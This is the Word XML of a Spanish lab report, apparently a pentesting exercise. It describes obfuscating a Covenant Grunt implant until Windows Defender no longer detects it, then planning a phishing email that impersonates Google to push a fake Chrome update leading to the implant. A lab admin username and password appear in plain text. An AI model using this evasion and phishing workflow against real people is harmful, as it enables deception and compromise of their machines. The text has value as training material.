    <w:p w14:paraId="7CB7AEE0" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAB7A38" w14:textId="0EF6B617" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29B44329" wp14:editId="236315DB">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="127417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73506" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289"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570F3407" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F15E97B" w14:textId="3B744E2E" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Le daremos en la pestaña de arriba a Add Function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C246583" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154E4351" w14:textId="20955D87" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D31B799" wp14:editId="696BCE91">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1328254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4643" name=""/>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2A629919" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2A1652" w14:textId="602E1E96" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y añadiremos todas las opciones que aparecen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E0955" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D18DD7" w14:textId="1D401AE8" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F54FDC3" wp14:editId="0B88D5C7">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="93534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8083" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId291"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47B788FD" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA68F91" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B3B118" w14:textId="7034ABE7" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FB3AC56" wp14:editId="03AF1703">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1897316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16379" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292"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324C7D02" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FC2C5B" w14:textId="3035A7BA" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora le daremos al símbolo de play, para que genere el exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBED33" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C20A7CF" w14:textId="6C6890F5" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="028DF3A7" wp14:editId="6FCA2099">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1436104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4222" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId293"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297763D6" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D6E38D" w14:textId="47408744" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y aquí le daremos a que no.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A9F39" w14:textId="77777777" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFAF99A" w14:textId="5C7BE65D" w:rsidR="00277D0C" w:rsidRDefault="00277D0C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora comprobaremos la carpeta en donde se creó el exe ofuscado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF36C7A" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E12D0FB" w14:textId="48A0532E" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49A3DA16" wp14:editId="4250631A">
            <wp:extent cx="5400040" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="76814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46223" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId294">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2131060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3496565D" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3AA26F" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9A2F79" w14:textId="1D85B6A0" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora volveré a activar el antivirus de </w:t>
      </w:r>
      <w:r w:rsidR="00D62AA6">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para comprobar si lo detecta o no:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503515B1" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26360F19" w14:textId="5831AF19" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05174866" wp14:editId="55446243">
            <wp:extent cx="5400040" cy="5805805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="885490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90481" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId295" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68555934" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B24D9A6" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4057A425" w14:textId="7AE75C04" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos ver como detecta directamente el Grunt sin ofuscar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1E266" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0333E494" w14:textId="54DB6A24" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0083C6FE" wp14:editId="1A232458">
            <wp:extent cx="5400040" cy="5805805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="455072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2333" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId296" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70D5EE" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168793E4" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651252BF" w14:textId="134AF619" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Eliminándolo de la carpeta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2F70C" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AC8CEA" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215C0518" w14:textId="2F653B26" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C2D390" wp14:editId="4235C1E4">
            <wp:extent cx="5400040" cy="1722120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21299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28486" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1722120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93FB26" w14:textId="7ECDE8B9" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>En cambio el EXE ofuscado no es detectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E781034" w14:textId="77777777" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B06023" w14:textId="4BB9BF81" w:rsidR="00F67B86" w:rsidRDefault="00F67B86" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Llegando a ejecutarlo sin problemas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28221639" w14:textId="1399477C" w:rsidR="001F19CE" w:rsidRDefault="001F19CE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A2FF3D" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2282941B" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9407F0" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77892572" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D5E8D4" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1923859A" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FCA8D4" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1274CDF4" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A739A5" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A05B79" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D15C0C5" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="248CD6E0" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D16991A" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAE6293" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DCBAB5" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CBF62E0" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F613FD" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4272F1" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C28B5D" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F191AD" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084AFC62" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7388D99B" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C6CB02" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1394BA3E" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D3C378" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E255A6" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592283AC" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0438BE24" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C4A4D7" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C75795B" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352AED42" w14:textId="52268658" w:rsidR="001F19CE" w:rsidRDefault="002C65FB" w:rsidP="002C65FB">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc135576001"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ataque:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="12B73DCB" w14:textId="77777777" w:rsidR="001F19CE" w:rsidRDefault="001F19CE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F97697A" w14:textId="55E2F547" w:rsidR="001F19CE" w:rsidRDefault="00F66AB1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Vamos a usar este programa para tomar el control de la máquina de Windows10, la IP de esta máquina es 192.168.1.135.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B15FF" w14:textId="75BC154E" w:rsidR="00C00E78" w:rsidRDefault="00C00E78" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>EL usuario que usaremos será el usuario Administrador local de este sistema que es Alesander ‘abc123.’ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B400255" w14:textId="77777777" w:rsidR="00F66AB1" w:rsidRDefault="00F66AB1" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD4BF81" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00C738A5">
        <w:t xml:space="preserve">Para realizar este </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ataque de phishing coy usar esta aplicación </w:t>
      </w:r>
      <w:r w:rsidRPr="00C738A5">
        <w:t>PhishMailer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId298" w:history="1">
        <w:r w:rsidRPr="008824B6">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://github.com/BiZken/PhishMailer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EC373CF" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3E8BAA" w14:textId="216F03BD" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo que haré es crear un correo electrónico que simule ser del equipo de correo de Google, en ese correo se dirá que </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disponible la nueva versión de Google Chrome, y que la descargues pulsando en el botón descargar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3980CCD4" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3EB337" w14:textId="14EB91AC" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Cuando pulsen en el botón descargar se redirigirán a mi servidor web y se bajaran</w:t>
      </w:r>
      <w:r w:rsidR="0028446C">
        <w:t xml:space="preserve"> él </w:t>
      </w:r>
      <w:r>
        <w:t>.exe del Grunt de Covenant, con lo cual al ejecutarlo quedarán infectado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A21B3A" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBA2304" w14:textId="34DA65D6" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
